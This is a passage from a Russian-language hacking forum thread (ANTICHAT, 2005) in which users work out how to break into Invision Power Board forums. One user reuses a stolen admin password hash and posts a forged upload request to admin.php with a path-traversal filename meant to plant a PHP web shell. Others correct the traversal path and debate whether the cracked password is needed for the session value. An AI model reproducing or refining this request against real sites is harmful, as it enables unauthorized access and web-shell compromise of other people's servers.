HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 25.03.2005, 05:38
link
Новичок
Регистрация: 15.01.2005
Сообщений: 7
С нами: 11219581

Репутация: 0
По умолчанию

Рзве текст шела влезет в инеткряк?
 
Ответить с цитированием

  #12  
Старый 25.03.2005, 05:48
link
Новичок
Регистрация: 15.01.2005
Сообщений: 7
С нами: 11219581

Репутация: 0
По умолчанию

Да стати когда ставиш относительный путь типа "../../my.php" то он файл не создает, хотя директория доступна на запись, сам выставлял права, т.е. естил на своем форуме.
 
Ответить с цитированием

  #13  
Старый 27.03.2005, 23:53
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию

Цитата:
Сообщение от link  
Рзве текст шела влезет в инеткряк?
Свободно...
 
Ответить с цитированием

  #14  
Старый 10.04.2005, 04:53
XJIOP
Познающий
Регистрация: 23.03.2005
Сообщений: 40
С нами: 11122570

Репутация: 13
По умолчанию

народ получил хэш захожу под админом все ок, а в admin.php нужен пароль, перебрал кучу словарей кароче кирдык, как можно в админку залесть зная хэш админa?
 
Ответить с цитированием

  #15  
Старый 10.04.2005, 05:02
XJIOP
Познающий
Регистрация: 23.03.2005
Сообщений: 40
С нами: 11122570

Репутация: 13
По умолчанию

с этим скриптом выдает ошибку

id='description'>You must have administrative access to successfully log into the Invision Board Admin CP.<br>Please enter your forums username and password below<br><br><span style='color:red;font-weight:bold'>Could not retrieve session record</span></div> <!--IPB.ERROR--> <!--IPB.MESSAGE-->

прально ли я понял?

POST http*://site.com/forum/admin.php?adsess=ид сесия? HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http*://site.com/forum/admin.php?ид сесия?&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=ид админа;
pass_hash=тут понято;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

ид сесия?
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../forum/uploads/lol.php"
Content-Type: application/octet-stream

нада еще что то менять? и дальше где исходник шела нада с ковычками? или просто (исходинк)?
 
Ответить с цитированием

  #16  
Старый 10.04.2005, 10:11
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами: 11282726

Репутация: 67
По умолчанию

мдя =)
Этот путь указан неверно.
../../forum/uploads/lol.php

../../ <-это означает что файл заливается на 2 дириктории вниз (блеже к корневой)
допустим www.lol.ru/dir1/dir2/dir3/admin.php
находясь в админпхп чтобы залить файл в dir2 надо указать путь ../../upload_file
чтобы в dir1 то ../../../upload_file
Вот так если я нечего непутаю.

Второе у тебя нехватает самого аплоада

<% echo("php script") %>
-----------------------------7d43942c405bc--
 
Ответить с цитированием

  #17  
Старый 10.04.2005, 10:26
BlackPrince
Познающий
Регистрация: 13.10.2004
Сообщений: 82
С нами: 11354906

Репутация: 13
По умолчанию

без расшифровки пароля залить шелл не получится. Ты админский пароль расшифровал?
 
Ответить с цитированием

  #18  
Старый 10.04.2005, 10:45
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами: 11282726

Репутация: 67
По умолчанию

для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.
 
Ответить с цитированием

  #19  
Старый 10.04.2005, 11:11
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию

Цитата:
Сообщение от (-=util=-)  
для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.
Нет, расшифрованный админский пароль все равно нужен. Иначе ты adsess не узнаешь
 
Ответить с цитированием

  #20  
Старый 10.04.2005, 13:03
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами: 11282726

Репутация: 67
По умолчанию

ну ептель тогда нет смысла париться с этими паками :\
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
залить шелл через ipb 2.0.4 alakazam Уязвимости CMS / форумов 4 16.11.2005 22:08
Как залить шелл через PhPBB SheFF Уязвимости CMS / форумов 5 29.11.2004 01:25
Как залить шелл через IPB форум, при отсутствии ftp? bbmz Уязвимости CMS / форумов 1 26.11.2004 18:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.